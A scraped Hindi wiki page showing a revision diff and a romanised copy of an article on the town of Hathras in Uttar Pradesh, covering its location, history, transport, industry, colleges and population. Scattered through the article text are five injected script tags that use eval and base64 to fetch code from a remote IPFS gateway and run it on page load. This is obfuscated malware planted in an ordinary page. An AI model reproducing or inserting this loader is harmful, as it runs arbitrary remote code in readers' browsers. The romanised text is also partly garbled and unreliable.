Difference between revisions of "हाथरस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(11 intermediate revisions by 5 users not shown)
Line 1: Line 1:
'''हाथरस'''
 
 
{{tocright}}
 
{{tocright}}
==स्थिति==
+
हाथरस शहर उत्तर [[भारत]] के पश्चिम-मध्य [[उत्तर प्रदेश]] राज्य के [[अलीगढ़]] शहर के दक्षिण में स्थित है। यह एक [[लोकसभा]] क्षेत्र है।
हाथरस शहर, पश्चिम-[[मध्य प्रदेश]] राज्य के उत्तर [[भारत]], [[अलीगढ़]] शहर के दक्षिण में स्थित हैं। यह एक लोक सभा क्षेत्र हैं।
 
 
 
 
==इतिहास==
 
==इतिहास==
*दक्षिण-पश्चिमी दिशा में 19वीं शताब्दी के एक दुर्ग के भग्नावशेष विद्यमान हैं।  
+
हाथरस में दक्षिण-पश्चिमी दिशा में 19वीं शताब्दी के एक दुर्ग के भग्नावशेष विद्यमान हैं।
*हाथरस शहर में सन 1906 में जन्मे काका हाथरसी ( असली नाम: प्रभुनाथ गर्ग ) हिंदी व्यंग्य के मूर्धण्य कवि थे।
 
 
 
 
==यातायात और परिवहन==
 
==यातायात और परिवहन==
*हाथरस की सड़क व रेलमार्ग अलीगढ़ से जुडी है।  
+
*हाथरस की सड़क व रेलमार्ग अलीगढ़ से जुड़ी है।  
*हाथरस सड़क [[मथुरा]] से जुडी है।
+
*हाथरस सड़क [[मथुरा]] से जुड़ी है।
 
 
 
==कृषि और उद्योग==
 
==कृषि और उद्योग==
हाथरस कृषि उत्पादों का व्यापार केंद्र है और यहाँ के उद्योगों में कपास तथा तेल मिलें और हल्के निर्माण से जुड़े उद्योग शामिल हैं।  
+
हाथरस [[कृषि]] उत्पादों का व्यापार केंद्र है और यहाँ के उद्योगों में [[कपास]] तथा तेल मिलें और हल्के निर्माण से जुड़े उद्योग शामिल हैं।  
 
 
 
==शिक्षण संस्थान==
 
==शिक्षण संस्थान==
 
हाथरस शहर में पी.सी. बागला कॉलेज, सरस्वती डिग्री कॉलेज और आर.डी.ए. गर्ल्स कॉलेज हैं। आगरा विश्वविद्यालय के कई कॉलेज यहाँ हैं।
 
हाथरस शहर में पी.सी. बागला कॉलेज, सरस्वती डिग्री कॉलेज और आर.डी.ए. गर्ल्स कॉलेज हैं। आगरा विश्वविद्यालय के कई कॉलेज यहाँ हैं।
 
 
==जनसंख्या==
 
==जनसंख्या==
हाथरस की कुल जनसंख्या (2001 की गणन के अनुसार) 1,23,243 है। हाथरस के कुल ज़िले की जनसंख्या 13,33,372 हैं।
+
हाथरस की कुल जनसंख्या ([[2001]] की गणना के अनुसार) 1,23,243 है। हाथरस के कुल ज़िले की जनसंख्या 13,33,372 है।
 
 
  
 +
{{प्रचार}}
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
==संबंधित लेख==
 +
{{उत्तर प्रदेश के नगर}}
 +
{{उत्तर प्रदेश के पर्यटन स्थल}}
 
[[Category:उत्तर_प्रदेश]]
 
[[Category:उत्तर_प्रदेश]]
[[Category:उत्तर_प्रदेश_के_ज़िले]]
 
 
[[Category:उत्तर_प्रदेश_के_नगर]]
 
[[Category:उत्तर_प्रदेश_के_नगर]]
 +
[[Category:भारत के नगर]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:14, 27 August 2011

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

hatharas shahar uttar bharat ke pashchim-madhy uttar pradesh rajy ke aligadh shahar ke dakshin mean sthit hai. yah ek lokasabha kshetr hai.

itihas

hatharas mean dakshin-pashchimi disha mean 19vian shatabdi ke ek durg ke bhagnavashesh vidyaman haian.

yatayat aur parivahan

  • hatharas ki s dak v relamarg aligadh se ju di hai.
  • hatharas s dak mathura se ju di hai.

krishi aur udyog

hatharas krishi utpadoan ka vyapar keandr hai aur yahaan ke udyogoan mean kapas tatha tel milean aur halke nirman se ju de udyog shamil haian.

shikshan sansthan

hatharas shahar mean pi.si. bagala k aaulej, sarasvati digri k aaulej aur ar.di.e. garls k aaulej haian. agara vishvavidyalay ke kee k aaulej yahaan haian.

janasankhya

hatharas ki kul janasankhya (2001 ki ganana ke anusar) 1,23,243 hai. hatharas ke kul zile ki janasankhya 13,33,372 hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>